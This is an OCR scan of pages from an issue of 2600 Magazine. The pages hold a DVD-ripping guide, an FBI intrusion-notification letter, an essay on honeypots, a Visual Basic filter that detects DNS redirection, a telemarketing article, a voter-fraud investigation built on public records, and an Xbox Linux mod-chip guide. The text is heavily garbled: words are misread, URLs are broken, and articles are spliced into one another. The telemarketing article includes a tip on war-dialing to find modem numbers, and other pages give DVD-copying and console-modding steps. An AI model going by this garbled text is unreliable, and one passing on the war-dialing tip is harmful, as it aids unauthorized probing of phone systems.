tracks you want ripped. I usually just rip them
all and then only convert ihe English track, but
if you're hard pressed for drive space, then cut
out what you donāt want. Next, click the settings
tab. Under settings, 1 recommend setting key-
check to "Every VOB File" and filespl tiling to
āMax Filesize", Now set the max-file size u
] 0,000MB (lOgb). This way the movie will he
ripped to one big file on your hard disk. (Want
ing I This is only possible wilh NTFS, If you
have a FAT file system, set max-filesi/c lo
4,000MB,) I
3: Click start and wait until the DVD is
finished. It shouldn't take more than an hour.
4: Fire up DVD2AVL Once again, I recoin
mend taking a look around the program be fort
blindly trying to follow my steps. Go to file
jopen. A blank box will appear with three but-
tons on the left side. Click "Add" and add the
lile(s) you just ripped to the box, then click OK
5: Press F5 to make sure the movie tool
OK and (he VOB files arc in the right order. You
wilt not have audio and the video will be East,
This is normal Make note of the aspect ratio OQ
the box that pops up along the righL side. You
are almost ready to convert to either AVI or
d2v/wav. Check your menu settings. For audio!
Track number should he "I", channel formal
should be "Auto", Dolby Digital should be M Do
code", MPEG Audio should be "Demux", ami
48- 144, l should be off. Video settings should bn
left alone,
6(A): AVI users rejoice! This is the last su p
for you! Go to file-]save AVL pick a filenunu
and location, and click "Save 11 . Now a box pops
up asking you to select your preferred video
compression method. Choose your poison il
recommend DivX 5.0.2) and click OK, then su
back for a few hours while it converts. If the 1
is too large, find an AVI splitter out there. Iāve
heard AVlChop is good.
6(VS): VCD and SVCDs need a few' morel
steps. Still in DVD2AVI, click file-jsave pro
ject. Name the project and click "Save". It will
run through Ihe movie file once or twice and
then beep when it finishes. This process should
take less than the ripping process, but it depend*
on your processor. Once itās done, write dow n
the contents of the "Aspect Ratio" and "Video
Type" boxes. We need that informal ion i
TMpgEne.
7: (From now cm, all unlettered steps reh i
VCD and SVCD only, since AVI users should
have stopped reading this already.) Now v
2600 Magazii h
Page 12
have a *.d2v and a *.wav file. We need to merge
these into a single MPG hie. Fire up TMpgEne,
Once again, take a look at what it can do be lore
trying to rip - this program in particular is very
useful, I highly recommend playing with the
"MPEG Tools" under the file menu. Now that
you are ready to go, check out the bottom of the
main TMpgEne screen. You have three boxes
there: āVideo Source", "Audio Sourceā, and
"Output File Name". For video source, we want
Ihe *.d2v file w r c just created, and for audio we
want the *,wav file, (Side note: listen to the
wave before finishing this step. If it s not the au-
dio track you want, go back to the DVD2AVI
Mep and select a different audio stream from the
audio menu until you get the one you want) For
the Output file name, select where you want the
MPG file to be saved. Now we need to set up
the encoder Click the "Load" button next to the
output file name box, and navigate to the "TMp-
gEnc\Template" folder. From here we have the
choice of loading a number of templates, but
we re interested in only four: VideoCD (NTSC),
VideoCD (NTSCFilm), SuperVideoCD
( NTSC), and SuperVideoCD (NTSCFilm),
8(V): VCD users check where you wrote
down the "Video Type" from the end of step 6.
If it was higher than 90 percent Film, load the
"VideoCD (NTSCFilm)" template. If the video
type was anything else, just load " Video-
ed P( NTSC)", Now' click setting. Leave every-
thing alone except for this setting: Under
advanced, change the "Source Aspect Ratio" to
what you wrote down front "Aspect Ratio 1 ' at
the end of step 6. Now click OK to go back to
the main window. You're ready to convert to
MPG, Click "Start" in the top left corner and
then get some sleep. It takes up to three hours
on a 2ghz Athlon machine, probably much
much longer for most of you.
8(S): Video CD users, use the instructions
from step 8(V) - just load the SuperVideoCD
templates.
9: Boy, that took a while. Now we have an
mpg file of the complete movie. Check it for
quality, audio synch, and general not-being-
serewed-up. When you're satisfied shat the tile
is complete, it is safe to delete all the other files
that you used for this project. Now the tile
should be roughly a gig for a no rmal length
movie. We need to split il up. Stay in TMpgEne.
Remember when I mentioned the cool MPEG
f ools? We're going to use one of them now. Go
to file-IMpcgTools. Click Lhe "Simple De-Mul-
tiplexā 1 tab. Load the mpg file of the movie into
the "Inputā file box, and the other two should be
automatically filled in for you. Click the start
button. It will rip the MPG file into a *.m 1 v and
a *.mp2 lile. These we need to load into BBM-
peg. Go lo the BBMpeg folder and run
"AVI2MPG2". It looks very confusing when it
loads, but don't fret. Take a look around again.
What we need to do is simply click the "Start
Encoding" button, ignoring the very confusing
initial interface. Click the Settings button. We
need to set something on three out of the four
tabs you now have access to. On the "General
Settings" tab, set the "Max Size(MB)" to a num-
ber equal to roughly half Lhe filesize of the file
you have, but don't go higher Lhan I OMR less
than the size of your CD you will burn it to. 1
like to keep mine set to 640MB, it seems like a
pretty standard size. On the "Input and Output
Files" tab, we need to set three things. The "Pro-
gram Stream File" is the name of the output file
you want. Your half-movies will be called f file-
name fOI. mpg and { filename |02 mpg. Now (br
the "Video Stream File" and "Audio Stream
File", use the *.mlv and *.mp2 files we just cre-
ated, respectively. The last tab is the "Program
Stream Settings". Simply choose "VCD' or
"SVCD" from lhe radio buttons. The fourth tab
allows you to save your settings for this pro-
gram, Do so if you are going to be using it a lot.
Click OK to get back to the "Start Encoding"
screen, then click Start", This shouldnāt lake
very long,
10: Now we have two (or sometimes three)
files that are small enough to fit on CDs. Load
up Nero, In the "Create CD" dialog, ruCTO should
have options for both VCD and SVCD. Select
whichever applies. Under the ISO tab, select
'ISO Level 2" for the filename length, and "ISO
9660" as the character set. Also check all the
boxes under "Relax ISO Restrictions". Now we
are ready to burn. Click "New" and it will take
you to a normal CD creation screen, except the
CD window has both a directory structure and a
file list box in it. Drag your file to the white box
under the directory tree, not into the tree itself
even if you know where it goes. Nero will check
the file. It it complains, just ignore it. Et should
still work. Now bum... and you will have your-
self a fresh VCD or SVCD. Repeat this step for
the rest of the disks needed to get the full movie,
1l(V): Playing VCDs on computers: You
can use a software VCD player, or just go into
the CD and open "AVESQ0I.dat" in the "MFE-
GAV" folder with your favorite media player.
Page 13
Winter 2002-2003
11(S): Playing SVDS needs a compatible
DVD software player or an MPHG2 codec for
your Medial Player. Personally, I use ATIās me-
dia center, or Power DVD.
1 2: Enjoy! Props to KalLI - I learned how to
rip DVDs using his site. Also, check out after-
dawn .com - there are some good things on
there. I would also like to ask Wilson to read
this article aloud to the class like he always
does. Thanks.
Links
till tp jf w w w, all e rdaw n .c om/so ft w a re/vi dco_sot i
ware/d vd_r i ppers/sma rt ri ppe r.e fin
h up ://w w w a herd aw n . co m/so ft w are/v i dco_so ft
wa re/d vd_ri ppers/d vd 2a vi, dm
h itp ://www + afterdaw n .com/st > ft wore/v i deo_s< > ft
ware/v ideo_ too I s/tmpgenc. c f m
h up ://me tube rs, cox . net/beye le r/hbmpeg. him 1
http://www,adaptec, com/world wi de/support/dr 1 ā
ve rdet ai L him I ?Cflt=/Pr< kIucI/ A S PI -
4,70&fi lekey=saspi _v470.exe
UJS, Department of Justice
Federal Bureau of Investigation
In Reply. PfcUic Refer tu
File Nu
he NASA Office of Inspector General and the FBI are conducting a joint investigation
into unauthorized computer intrusions that have affected both the government and private
industry. During the course of this investigation, we discovered a log file listing Internet
Protocol addresses and server names, it appears to be a list of computers that were
compromised.
In order to notify the potential victims of ibis criminal activity and enable them to check
their own systems, we have compared the log of IP addresses and server names against the most
recent information available in the WHOIS database. This letter is being sent to you because the
IP address or sewer shown below, and last registered to you, appeared on the log file of apparent
victims.
We have no indication that the intrusions associated with this activity are continuing. We
also are unaware of the hacker's methodology against your system, the potential level of access,
or the possible damage to your system. The time frame of the activity to which the log file
relates occurred between December 2001 and March 2002, with the majority of the activity
occurring in mid -February 2002,
This communication is being provided to you by the Watch and Warning Unit of the
National Infrastructure Protection Center (NIPC), located at FBI Headquarters in Washington,
D.C. In addition to the recommendation that you check your log files for indications of unlawful
activity and lake appropriate mitigation action, NASA and the FBI request that you provide any
information relating to this matter to the NIPC by e-maiting the W T atch at ni pc, ware fra 1 : fhi.gov.
For recommendations about examining your systems in a manner dial helps preserve die
evidentiary value of information you discover, please refer to the NIPC website at
www . n ipc . go v/incid ent/ i nc i d ent2 . h t m .
System (s) Information
i he kicker of this is that both the contact and domains referenced had nothing to do
with us and we were apparently sem this letter in error. Yet more wasted time and
re st >u ree s . he Wa t e h a nd Warn i n g Unit ? ! )
Page 14
2600 Magazine
they would not under normal circumstances en-
gage in. It's going to be next to impossible for
poor xy63r ninja to use an entrapment defense
in court, because by the time po po shows up. it
will be obvious he was lame-assing around of
his ow n accord. However, if a crafty admin goes
on IRC and tells everyone that his honeypot is
actually the fabled government computer that
holds the truth about the Kennedy assassination,
Area 5 1 , and ancient methods of dolphin flog-
ging and people hack him. then an entrapment
defense would stand a chance. The reason is
that the admin could never prove that xy63r
ninja and his crew were going to hack his sys-
tem without being enticed. Other critics say that
honey pots are akin to electronic wiretapping.
This 1 can agree with. Since there is not much
legal regulation of honeypot technology, and
the closest legal procedures are loose at best,
some very scary things could happen.
Other companies could expand the basic
thrust of the technology, perhaps into the p2p
networks. At lhat point it would be us, the
hacker community, that stands up and tells the
world thaL Lhis is a gross invasion of privacy.
Then, pretty much just like the MPAA did to ns,
all they would conceivably have to say is: ' Con-
sider the source, your honor. Hackers want this
technology stopped. Hackers are criminals. Yon
don't want to side w r ith criminals, do you? We
are here to protect the American people from
hackers, and wc need you to he brave and give
us the power lo shut these nasty people down."
Then in all likelihood, the corporations would
roll right over us again. I don't think it takes a
major leap of logic to see that this is where hon-
ey pot technology, or more specifically, technol-
ogy that clearly violates people's rights under
the guise of protection, could be headed. Also, I
donāt trust the "good guys" any farther than I
can throw them. We need to put a handle on the
situation before the "security community" gets
any ideas on how to further expand their powers
past our rights on the backs of the hacker
community they demon i/.e lo get their way.
Why Hon e y pots A re
Not Practical For Everyone
The good news is that honey pots arc not a
true "solution,ā The best application for a hon-
cypoi is to track an intruder who has already
made a home in ihe system. The most notewor-
by Bland Inquisitor
bland _iuquisitor@hotiDuil.c0tn
Honey pots are usually programs lhal emu-
late services on a designated port, but once suc-
cessfully cracked, offer no real power to the
altacker. The honeypot program will then alert
ihe admin that an attack is in progress, and will
allow the admin lo Lrack the attackerās every
move. Honey pots will also show the methods
the attacker is using to gain entry, and what
methods are being used to cover his or her
tracks. In this article, 1 will show how honey-
pots work, why honeypots are not generally
practical for most security situations, and how
honey pots are breeding both smarter attackers
and dumber admins.
How Honey pots Work
Honeypots are designed to operate on many
levels. They increase the time an attacker will
spend because the honeypot makes it unclear
which attacks work and which ones don't. They
let the admin know what method an attacker is
using before they succeed - such as port scan-
ning, bruie forcing a password, or a Send mail
attack. Once honeypots are widely imple-
mented, the attacker will be forced to spend
more time in a system that may be closely
watched, and will eventually be scared off.
Also, once xy63r ninja the script kiddie stops
going anywhere near the system, admins can fo-
cus all their attention on fending off people w ith
actual skill.
In one of the honeypot advertisements I
read, port 365 was being used as the honeypot
porL, This means that a scan that returns port
365 as active will make the would-be attacker
turn and run off and sltal systems lhal are not
running the honeypot can use port 365 as a
blulT. so that when xy36r ninja the script kiddie
sees it and the system looks sexy, he will be less
inclined to go in because he thinks that the vul-
nerabilities he sees are a deception. According
to SecTech systems administrator Dan Adams,
honeypots are "like opening a fake store, load-
ing i( with cool stuff, and sitting back hoping
someone will break into ii."
Honeypots are catching a lot of pretty seri-
ous heal from ihe legal and ethical community.
Some critics are calling honey pots entrapment.
Let me clear this up for you. Entrapment occurs
w hen a person is coerced to commit a crime that
Page 15
Winter 2002-2003
thy case of this happening was documented by
Clifford Stoll in his book The Cuckoo's Egg.
Stoll was an admin at Berkeley when he found
an intruder using his system to steal secrets. But
only an admin who has been around the block a
few times and watches his system often can
make full use of honey pots. Apart from that,
over 90 percent of attacks against a system
come from inside, and there is nothing a honey-
pot can do to stop someone who has internal ac-
cess from running amok For the average
company, the extent of a honeypofs effective-
ness is to keep xy63r ninja and the rest of die
script kiddies away, and to show that (here is a
real threat of people breaking into the system. It
is almost unheard of that a honey pot traps
someone with real skill because it is designed to
keep the kiddies at bay.
In the digital arms race, tightening the exist-
ing Security holes will only force the attackers
to get better while the admins get complacent.
Most admins are only slightly better than good
ole xy63r ninja in the first place - they get the
latest and greatest piece of ready-made software
and call themselves experts. What is bound i"
happen in the majority of the situations is that a
company sets up a houevpol and never bothers
to spend the time it takes to maximize its effec
live ness. Of course, the true answer is lor ad
mins and software programmers to actually take
a little pride in their work and do their jobs
properly. Also, h would help if software compa-
nies would take some responsibility when they
find security holes in their product and update
accordingly. System admins should also feci
obligated to keep their software current, and
make sure nobody within their company is
given more access than they need.
Shout outs: stankdawg , grifter, dehug. pro-
jeci honey net. And an apology if anybody actu-
ally uses the name xy63r ninja.
Redirection stopped
by cMd_bOM
The letter from "bradsnef in 1 9; 3 uboul how Ford could redirect back to 2600.com or 127.0.0. \
etc. got me thinking about how easy that could be. It turned out to be easier than ! thought. Every
http request has a host field in it that contains the address that was typed in. so if I type in
www.2600.conT and click "Go'* it will have www.2600.com in the host held.
All browsers that l know of send the host field in their http request. If DNS redirects a site, the
host field will not change when redirected and so we can detect it with little effort.
Example of a HI TP request (notice the host field):
GET/ HTTP/1.1
Accept: +/*
Accept -Language: emus
Accept-Encoding: gzip. deflate
User- Agent: Mozilla/4.0 ( compatible; MS IE 5.0; Windows 98: DigExt)
Host: www.2600.com
Connection: Keep-Alive
<crlfxcrlf>
Included is a small VB program (I used VB to show how easy it is) that scans all incoming hup
requests and checks to see if the host field is the web address or the IP address of the current web-
site. If not, it redirects to 2600.com, and if so it redirects to Ford's website. This doesn't protect from
meta tag redirection, or (I)FRAME redirection which needs a webpage to do the redirecting, ratlin
than a DNS entry. Here is a script that can stop that (real simple - it look live minutesā). Hey, a 16
year old can do it, so can a big corp.
<html>
<head>
<script>
spl i t i t=documen t . re ferrer. s pi i t ( 1 7 1 r )
Page 1 6
2600 Magazine
if (splilitf2|= ,r www.fuck generalmotors.com") [
document. writeO^htm I xheadxmeta hltp-equi v=' REFRES1 1
content-' 1 ;URL=http://www.2600xom'></head></hinil> 1 ' );
1
else {
cl oc u men t , wri te ( <hi ml xhcu d>< meta http- eq u i v =' R E FR ES H r
co n le n L= f I ; U R L= h ttp ://www, ford, com 'x/he adx/h tm 1 > " ) ;
1
</script>
</head>
</html>
OK, here is the DNS Redirection filter made in VB.
Note: If you are going to set this filter up you'll have to change your server port to something
other than HO and change the meta headers to redirect to that port (big deal, unless you're running
IIS). You could add this feature to an open source web server, too. You could alter the code to
redirect to the port directly.
Step 1. Create a project wiLh "Standard EXE M .
Step 2. Add a Win sock component and name it Win sock 1 (dial's the default).
Step 3. Change the properties of W insock 1 s Index tab to 0.
Step 4. Make a form and name it Form I (default again).
Step 5. Put the code below in the form.
āDNS Redirection filter
'by cO!d_b(X)i
'for Fored(Iol) and NPR
Private we bad dress As String
Private web ip As String
Private intlastcontrol As I .one
Private Sub Form_Load()
we bad dress = LCa$e(Winsoek 1(0). Local HosiName)
webip = Win sock 1(0). Local IP
intlastcontrol = 0
With Winsockl(O)
.LocalPort = 80
.Listen
End With
End Sub
Private Sub Winsock I _Connect ion Request ( Index As Integer, ByVal request id As Long)
If Index = OThen
intlastcontrol = intlastcontrol + l
Load W i n sou k l ( i m 1 as Icon t ro l )
Winsock I (intlastcontrol). LocalPort = 0
W i n soc k 1 ( inti as tcont rol ) .A ccep t req ue st id
End If
End Sub
Private Sub Winsock l_DataArrival( Index As Integer, ByVal bytesTotal As Long)
Dim data I As String
Winsock 1 (intlastcontrol ). Get Data datal
On Error GoTo redirect normal
al ā InStril, datal, āHost: ") + 6
a2 - InS tr(aL data I . vbC rLf)
a3 = LCase(Mid( datal, al, a2 - al))
If a3 = webaddress Or a3 - webip Then
Winter 2002-2003
Page 1 7
GoTo redirectnonnal
Else
' D N S red ireclion de tecte d red i rec ting bac k t o 2600. com
Wmsockl(mUastcontrol).SendData "<htmlxheadxmeta http-equiv=" +Chr(34)+ "REFRESH"
+ Chr(34) + " conttnt= r + Chr(34) + "l;URL=4ittp://www, 2600 . com" + Chr(34) +
"x/hcadx/html>" 'meta tags here
End If
Exit Sub
here we do a normal redirection to ford.com
redirect normal:
Winsock l (intlastcontrol ).SendData ,r <html><headxmeta http-equiv=" + Chr(34) + "REFRESH"
+Chr(34) + " conte nt=" + Chr(34) + G ; U R L=hUp ;// www. ford, com :8(F + Chrl34) +
"x/head></html>" meta tags here
End Sub
Private Sub Win sock I _SendCfomplete (Index As Integer}
Winsock I (intlastcontrol). Close
End Sub
Step 6: Compile and run.
Shoutouts: Hi Mom, Bryan, Cassidy t my bro (Nathaniel), and whoever I forgot.
More on
Tel Ā©market i rig
by DĀ» Foetus
In response to the number of letters re-
ceived regarding the TcleZapper and similar
systems that will Vap" vour phone number
from a telemarketing system's database* here is
some more insight.
Many larger telemarketing, market re
search, and bill collection companies use auto-
dialers coupled with CAT I (Computer Aided
Telephone Interviewing) software systems.
It is the job of the autodialer to dial, say. ten
phone numbers for every human agent that is
currently seated in their calling center, know-
ing that one out of every ten phone calls will be
answered. The number of calls made by the
auto-dialer can be, and usually is, automati-
cally adjusted depending on how that 10:1 ra-
tio performs. For example, if the sample being
dialed consists of phone numbers culled from
product registration cards, the number of an-
swered calls may be higher than if the machine
is running RDD {Random Digit Dialing) in
valid area codes and exchanges, minus already
known phone numbers - basically war dialing
lor unlisted phone numbers.
If you ever get a phone call that shows up
on your Caller ID as being from, say, X YZ Re-
search, and it hangs up immediately after you
answer, you've received a 'nuisance call." This
happens when the autodialer has made more
calls than there arc available humans to patch
you to. Your phone number is now tiagged and
will receive special treatment - the system
knows you arc home and answering the phone,
but it also knows it just hung up on you. You
will now get another call from XYZ Research
in about 15 minutes (the amount of time lapsed
is set by the user system-wide], but this time
their system will reserve a human before call
ing you, ensuring that they get to talk to you.
The autodialing system will eventual Is
have dialed through the entire pool of sampf
and it will have pretty much determined whit h
phone numbers are good and which are not. lr
2600 Magazine
can distinguish between non- working numbers
(those that answer with the familiar tri-tone
followed by a recording of some sort), those
that do not ring at all those that are busy, those
that arc good (no answer, etc.), and those that
are fax/modem/machine numbers. Each phone
number has a status code assigned to it and any
bad numbers are resolved never to be called
again.
Aside: Interesting point here is that all the
fax/mode nV machine numbers will have re-
ceived a unique status code marking them as
such - basically there now exists a pool of
phone numbers that have a very high likeli-
hood of being modem numbers. Just as easy
would he to set up a project that runs automat-
ically overnight, dialing strictly 202-xxx-xxxx
numbers (if you wanted to find machine num-
bers in the DC area), and have your CATI soft-
ware just hang up on all good numbers. Look
at your "bad: modem number" list in the morn-
ing and you've got an excellent start on your
fun for the days to come. If one has the desire,
and access lo a larger system, one could easily
burn through tens of thousands of phone
numbers in a single night.
But back to the TeleZapper vs. auto- dialers
and other devices. For them to work, your
phone must actually go off hook and transmit
the tone(s). If an auto dialer calls your number
and your voice mail picks up, the call is imme-
diately transferred to an available agent, who
will mark your phone number as known good,
but you're not home (answering machine/ voice
mail answered). I'm sure you're already ahead
of me here, but, the obvious step to take is to
record the "bad number" tone(s) as the first
part of your outgoing message. Sure, it will an-
noy the hell out of your friends and family, but
it will kill your phone number in that sample
pool if it's being dialed by an intuitive
auto-dialer.
Note that I say that sample pool. Your
phone number may exist in myriad sample
pools at different companies. One way to dra-
matically cut down on telemarketing calls (and
market research calls, if you're so inclined,
though they arc two very different entities with
two very different agendas), is to first register
the phone number with the DMA (Direct Mar-
keting Association) as warning to opt-out of
telemarketing calls. Also, explain to any com-
pany you do not wish to hear from that you
wish for your phone number to be placed on
Winter 2002-2003
their "do not call" list. The DMA also allows
one to register their mailing address as well as
email address as opt-outs to cut down on junk
mail and, allegedly, spam email. Not all com-
panies check their sample against the DMAs
opt-out list, and not all maintain a M do not call"
list, but any company that wishes to do busi-
ness in an above -the- board manner will heed
your request. Telemarketing companies can he
somewhat sketchier than market research com-
panies - any market research company that
wants to stay in business and make money will
follow the guidelines for standards and ethics
set forth by the MRA (Marketing Research As-
sociation), CASRO (Council of American Sur-
vey Research Organizations), and other
organizations. A client will likely not do busi-
ness with a market research company that does
not belong to these organizations.
It does take a while for your opted-out
phone number/address/email address to trickle
down and through the giganric system that is
comprised of sample houses (those that pro-
vide the phone numbers, street addresses, and
e-mail addresses), and to the thousands of end-
users ( telemarketers and research companies),
but it does work, A perfect time to do this is
when moving and getting a new phone num-
ber, but ii will have an eventual effect if you're
staying pul as well.
Another option is to sign up for your local
telco's "security screening" plan, if available.
This will require any caller who is blocking
their Caller ID info to input their phone num-
ber, or the call will not be connected. One
drawback is that some long distance compa-
nies relay calls around the country to the clos-
est low -traffic switching point and the Culler
ID info is stripped in the process, requiring
Grandma to input her phone number each time
she tries to call you, since she's on a lixed in-
come and using Jimbo's Phone Company lo
make cheap long distance calls.
No one will ever be totally free from re-
ceiving unwanted phone calls, but there arc
ways to dramatically reduce them. As many
ways that there are of keeping our phone num-
bers in the hands of Lhose we want calling us,
there are ways of getting around whatever we
put in place to try to ensure this. Surely some-
what ironic to those reading this magazine,...
Page 18
r
Page 19
Cracking VOTER Fraud
by Kr@kH3d (DFxC)
f Why the goofy "teei" name / Overkill is funny...)
Some New York 2600 readers may have seen
ihe recent three minute report on WABC's Eyewit-
ness News (10/25/02) on the discovery of sus-
pected fraudulent voters in New Brunswick, NJ.
Since I ve been a longtime 2600 fan and played a
major part in the investigation, I figured I'd outline
how we did it. After speaking with the people at
the local Board of Elections and realizing how
easy it is to commit voter fraud, I also fell it may
be of use to others in general Oh, and if you saw
the report, there's a brief shot of my back while I'm
at the computer wearing an H2K shirt!
The technique outlined here was developed by
Lhe New Brunswick United (http://www.new-
bmnswiekunited.com) Antifraud Division, headed
by attorney Flavio L, Komuves. I was lead investi-
gator in charge of isolating possible cases of voter
fraud, and was ably assisted hy a number of Rut-
gers University student interns,
1 should preface this with the disclaimer that
the resources and procedures i am outlining are
legally available in New Jersey, and there is no
need to obtain any information illegally. Check
with your local authorities for your area. Also, a
new law regarding voting was recently signed and
certain new provisions will take effect in the 2006
elections. Always lake any information you gather
to a reputable lawyer and gel advice before releas-
ing it publicly - voter fraud is a serious charge and
falsely accusing someone (even unintentionally)
could probably result in charges against you! Also
keep in mind, any information we determined via
this method of database searching was later veri-
fied by actual held visits to the properties in ques-
tion.
It's actually rather similar to profiting a system.
The first step is to gather all the information possi-
ble about your target. Your first stop should be
your county Board of Elections. You will have to
fill out certain forms - being part of a political or-
ganization helps out here, as they reserve the right
to ask why you are requesting the information.
There are two databases they maintain thai you
will need to request on CD-ROM: the current Ac-
tive Voter Registration database ("walking list")
and the current Actual Voter Database ( "voting his-
tory"). There will probahly be a fee involved - ex-
cessive fees for preparation and other "costs" is yet
another way the government restricts your access
to information (while insisting on greater access to
your information). I believe it should come to ap-
proximately $60 for both CD-ROMs and li may
take a week or so for them to prepare.
The second stop is your local Municipal
Clerk's office. Here you request a listing of all paid
city employees [ Municipal Employee List" ).
specifying the following information: salar
whether or not he or she is a city resident, years o I
service, job title, and of course name. They must
release this information to any city resident as ii is
considered public information (your tax money
pays Eheir salary). Again, they may charge you tor
costs. In our instance, Ihe City Clerk's office tried
! browing us off by refusing to provide us with a
CD-ROM version, and instead provided us with a
printout of the database. Luckily, volunteers cre-
ated an Access database and entered the informa
tion into it within a day or so. You may also request
a listing of all rental properties [and landlord own
ers) from your city's Rent -Leveling Board or
simitar body.
OK t so now you have your base documents.
You've gathered your information. Now to poke
for weaknesses. What next? Well, first look at IT
Active Voter Registration and sort it by birthday
Any 172 year olds still registered? Probably not. il
so, cheek their names on the Actual Voter Dai a
base. In our investigation, we immediately noticed
an enormous number of people horn on
01/01/1901. According to the Board of Elections
this is their standard procedure for dealing with il
legible entries and/or people who registered to
vote before New Jersey required b nth date to he
added to the Voter Registration form. Sorry, strike
two. Next, run a query to isolate everyone from
like age 99 and up. If you feel there's an overabun-
dance. check the names against the Social Security
Death Index on http://www.ancestry.com. Don'i
gel too excited if you find matches though - Amcr
icans have the funny habit of naming their kids af
ter themselves. Go to hdp://nhvw.netronliue
.com/pub I ic_records.htm ( Property 1 a x Reeor \ Is
and make sure it isn't their son or grandson tin one
instance we originally thought for sure was voter
fraud, there was a son named alter his father, w ho
inherited the house his parents had lived in, and
then married a woman with the same first name as
his mother - creepy!). Be thorough, but don't waste
too much time on this - we had a team spend over
a month on this and turn up only a handful of "pi >
si hies. It might also be helpful to have some
working with you who has access to credit card
hi siories/databaxes , but I'm not sure if that is legal
or how useful it would be in this instance.
That takes care of the infamous 'dead vote
The next "weaknessā to probe is the Mumapnl
Employee List, Hopefully, you know yom u ā ā i
2600 Magazine
pretty well, because how effective your work here
will be will he in direct proportion to how well you
know your town. The first test is to query all non-
city resident employees and run their names on
both the Active Voter Registration and Actual
Voter databases. Note down any instances, but
keep in mind that ihe individual may have lived in
your town ni otic time, and showing up on the Ac-
tive Registration Database isn't a crime in and of
itself - voting I i.e., being on the Actual Voter Data-
base) is. Follow this up by running a query with all
employees making over, say, $65,000 a year. Run
their names on both the voter databases and pay al-
lent ion to what their registration address is. You
may discover some rather well-off individuals liv-
ing in really shady neighborhoods. In our investi-
gation, we caught the city's Chief of Operations for
Urban Renewal voting out of the same run-down
apartment in an impoverished high-crime area as a
small immigrant family. On investigation of the
Property Tax Records, we discovered he lived in a
nice home a few towns away! Most of our results
came from dfis method.
Requirements:
A mod-chip.
Ed's xbox linux (Debian derail ve) found at:
1 1 1 1 p ://sourc e forge . n e t/proj ect/sho wfiles, p h p ?gr
uupjd=54l92,
BIOS for mod-chip that allows Xbox to run
unsigned code.
E volu ti on X d ashb< Ā»ard ,
As some might have noticed, there has been
several strides made in Lhe attempt to pul Linux
on any device in which it would he logically
beneficial to the computer/hacker community.
Winter 2002-2003
If you managed to gel a copy of the landlord
tislings, be sure to check all those names thor-
oughly as well. A common form of voter fraud is
for landlords to register at a property they are rent-
ing out. A good portion of our leads were also gen-
erated this way by checking landlords we knew
had broken the rent-control laws.
The last method we used lhai had results was 10
start running names of business owners who oper-
ated in town. Much like the landlords, some un-
scrupulous business owners will register to vote at
their place of business.
Wet! , that's basically it in a nutshell. Hopefully,
this short article was informative and useful, as
well as a contribution showing that 2600 readers
are often more concerned about protecting and
maintaining the democratic process than the politi-
cians who scapegoat us as evil hackers. For ques-
tions or comments, email domi nickĀ® rami ustech
.com with "2600 1 ' in the subject line.
or just for the challenge of iu The Xbox is no
exception. Jt is now possible to pul a full Linux
distribution on the Xbox console, due to the
work of some very diligent Linux/Xbox hack-
ers. I will cover the steps to go about installing
Linux on your Xbox console and Lhe
significance of such an installation.
There are multiple reasons one might want
to go about installing Linux on an Xbox. For
one, it would serve as a very inexpensive desk-
top computer. Being Lhai you can now find
Xboxes selling at prices of $ 1 7G-S20Q, this is
understandably worthwhile. The Xbox is also
hy Live_wire
Page 20
Page 2 /
feature-rich, it is a gaming console, DVD
player, and now with the inclusion of Linux, can
be your desktop computer, DivX player, and
web/ftp server. Perhaps you would use it just to
run nominal functions, saving your main com-
puter the stress. This is just the beginning,
though. The possibilities are, obviously,
limitless.
This brings us to the actual installation. You
will need a modified Xbox to consider such a
setup. However* this is not as scary as it may
sound to Lhose who might not have soldering
experience. Gone are the days in which you
would have lo solder 29 wires to the Xbox
motherboard. You can now buy wireless mod-
chips which require no soldering at all. There is
a chip out now called the Matrix (by Xodus)
that is wire free and can he installed in a matter
of minutes. There are also other chips in devel-
opment that will be wireless also, so then it
would be just a matter of personal preference as
to which you would choose. T have chosen to go
with the Matrix chip because it has no wires to
solder, comes with a programmer, and, as far as
l have seen, is Lhe easiest to install, I must men-
tion also, if you don 1 ! want Lo fork out $60, you
can make your own. CheapLPC designed by
Andy Green, can be constructed for a few
bucks. Visit http://warmcat.com/iiiilksop/in-
dex.html.
So this is where we start. You have your
mod-chip of choice. You also downloaded the
-iso image of the Xbox Linux distribution lo-
cated at the sourceforge site mentioned at the
beginning of the article. You will need to flash
your mod chip with a BIOS lhal will support
running unsigned code on the Xbox. These
BIOSes can be readily found on the Internet
with a little due diligence. I mentioned that the
Matrix mod-chip comes with a programmer.
You can plug that programmer into the parallel
port on your computer and dash the Matrix with
BIOS software that way. You can get the flash-
ing software from http://warmcat.com/milk-
sop/ index.htm I (Xodus will release their own
GNU software shortly). I have chosen to go
with the EvolutionX 2,5 BIOS because it sup-
ports all the features one would want, such as
running unsigned code, among others* Next*
you will have to download the EvolutionX
dashboard, which will replace the original Xbox
dashboard, and will act as your new interface
with ihe Xbox and burn it to a CD-RW (X boxes
do not like CD-Rs). i his can also be found on
lhe net with a little patience*
4. Hack a way to circumvent the spyware or
adware software and most importantly post these
You will then need to open your Xbox and
physically install rhe mod-chip. After that, you
will want to install the EvolutionX dasbboan
ill at you downloaded and burned to CD. You
will now have a pretty new interface that hm
many features, such as backing up games (that
you bought) and whatnot. Once this is insta \
you will then he able to install your downloaded
Linux distro.
You might he thinking, how do 1 work win
Linux when all 1 have is an Xbox controller?
Well* as you might know, the controller ports on
the Xbox console are really just usb ports* with
a little modification. You can get ahold of an
Xbox controller extension, cut it in half leaving
the end that plugs into the Xbox intact, and look
at the wires. You will see a red, green* blue,
white, and yellow wire* the same as a standard
usb cable minus the yellow one* You can then
cut a usb cable, leaving the usb A end intact
which connects to your usb keyboard/mouse.
Solder the matching wires together and leave
the yellow Xbox wire by itself. Do this two
limes and you now have a keyboard and mouse
that you can plug into the Xbox and use with
Linux, assuming I mux supports the ones you
chose (make sure it does).
There you have it A Li mix /Xbox that can
now be used as you wish it to be* and the best
part about ti is that it is legal. The developers
that have been working hard on this Linux pro-
ject are not building this software on top of the
Microsoft kernel - they are using the Linux ker-
nel. They are also not using non -licensed soft
ware like the XDK, which is Microsoft's
development kit lor the Xbox. The reverse engi
nee ring that has been done has been done under
Sec t ion 1201 ( I ) Rev erse Eng i nee ri n g Ex ce p-
tion for interoperability of the DMCA.
1 am indebted to the Linux developers of
xbox- fi nux, so urce forge . net* the Xodus team
Xboxhacker.net {and its forum), Andy Green,
and several other sites/i ndi v i duals/hac k ers that
have made this article possible. 1 will cover the
more technical aspects of Xbox hacking in a l u
lure article, but 1 hope 1 have given enough in
formation so dial you might get a start with
hacking Linux onto the Xbox, and team in rliĀ«
process.
2600 Magazine
